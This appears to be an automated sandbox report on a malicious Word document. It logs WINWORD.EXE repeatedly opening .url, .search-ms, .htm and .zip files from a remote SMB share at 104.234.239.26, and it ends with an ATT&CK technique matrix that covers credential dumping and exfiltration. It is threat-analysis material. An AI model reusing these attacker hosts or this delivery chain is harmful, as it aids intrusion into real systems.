          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\PIPE\srvsvcJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\SHARE1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\PIPE\wkssvcJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\PIPE\srvsvcJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\ex001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.htmJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.htmJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.search-msJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.search-msJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.search-msJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.search-msJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.search-msJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\SHARE1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\ex001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.htmJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.htmJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.search-msJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.search-msJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.search-msJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zipJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.search-msJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.search-msJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\104.234.239.26\share1\Jump to behavior
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Exploitation for Client Execution
          Path InterceptionPath Interception1
          Masquerading
          OS Credential Dumping2
          Network Share Discovery
          Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
          Non-Application Layer Protocol
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
          File and Directory Discovery
          Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
          Application Layer Protocol
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
          System Information Discovery
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Ingress Tool Transfer
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.